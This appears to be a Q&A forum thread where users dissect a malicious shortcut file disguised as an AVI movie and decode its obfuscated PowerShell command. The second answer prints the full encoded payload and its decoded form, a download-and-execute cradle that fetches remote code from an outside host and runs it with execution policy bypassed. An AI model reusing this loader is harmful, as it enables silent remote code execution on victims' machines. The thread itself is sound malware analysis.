# Malware Using .Lnk file to Powershell

Tags: powershell, security, malware

I downloaded a file which I almost didn't think twice over, but the target (of the shortcut) caught my eye:

```
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP  . ( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code]
```

There's no doubt that something fishy is going on here.  I understand the first three parameters, but what I couldn't quite figure out is how code of a payload like this would work in just a basic shortcut?

Comment: Well when you click on it its running `. ( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code]`
But i dont think i really understand what you are asking

Comment: The first part of the code, represented by the decimal numbers, is `"$aspx ="`. You can identify the rest using http://www.asciitable.com/.

Answer (score 5):

My guess, it runs a Powershell with

- NoProfile
- WindowStyle 1 = Minimized
- ExecutionPolicy ByPass = Nothing is blocked and there are no warnings or prompts
- then dot-sources the remaining code

Let's split this code up:

```
( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code]
```

`$ShellId` is a built-in Powershell variable:

```
  >$ShellId
  Microsoft.PowerShell
```

So `( $shelliD[1]+$SHeLlID[13]+'x')` transforms to `iex` (= `Invoke-Expression`)

The rest of the code is `([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code]`. I gues the char array contains ascii characters. If so, we can transform it to:

```
$aspx =
```

Summary:

```
powershell.exe -NoProfile -WindowStyle 1 -ExecutionPolicy ByPass . iex "$aspx = ...."
```

So it invokes the code starting with `$aspx =` in a minimized Powershell window without warnings or prompts.

Maybe the code ran through one of these [obfuscation methods](https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Out-ObfuscatedStringCommand.ps1).

Hope that helps.

Comment: @aaron1312, if the above proposal is fine for you, please mark my solution as the answer. Thx

Answer (score 1):

I got the same. The file looked like a AVI and I opened it quickly to check the quality of the movie. It was actually a well-disguised shortcut:

```
PS C:\Users\pharg\Downloads\tv> $sh = New-Object -COM WScript.Shell
PS C:\Users\pharg\Downloads\tv> $target = $sh.CreateShortcut('C:\Users\pharg\Downloads\tv\A Simple Favor 2018.DVDRip720p
.XviD.AC3-EcHO.avi.lnk')
PS C:\Users\pharg\Downloads\tv> $target

FullName         : C:\Users\pharg\Downloads\tv\A Simple Favor 2018.DVDRip720p.XviD.AC3-EcHO.avi.lnk
Arguments        : -NoPr -WINd 1 -eXEc ByP  . ( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115,
                   112 , 120,32 ,61,32 ,40 ,40, 78, 101 , 119, 45,79 , 98, 106,101,99, 116 , 32 ,83, 121 , 115,116,
                   101 ,109,46 ,78 , 101, 116, 46,87 ,101,98 , 67 ,108,105,101,110 ,116,41, 41 , 46, 68,
                   111,119,110,108, 111 , 97 , 100, 83,116, 114 ,105 ,110,103,40, 39 , 104, 116 ,116,112 ,58,47, 47
                   ,122, 118 , 98 ,46,117, 115 ,47,49 ,39 ,41, 59 ,73 , 69 , 88, 32 ,36, 97, 115 ,112 , 120 ) ) )
Description      : .avi
Hotkey           :
IconLocation     : C:\WINDOWS\System32\imageres.dll,18
RelativePath     :
TargetPath       : C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WindowStyle      : 7
WorkingDirectory : %SYSTEMROOT%\System32\WindowsPowerShell\v1.0
```

The target here translates to:

```
$aspx = ((New-Object System.Net.WebClient)).DownloadString('http://zvb.us/1');IEX $aspx
```

I opened `http://zvb.us/1` and it seems I have had some code run on my PC. At this point, I am not sure what has happened. No symptoms...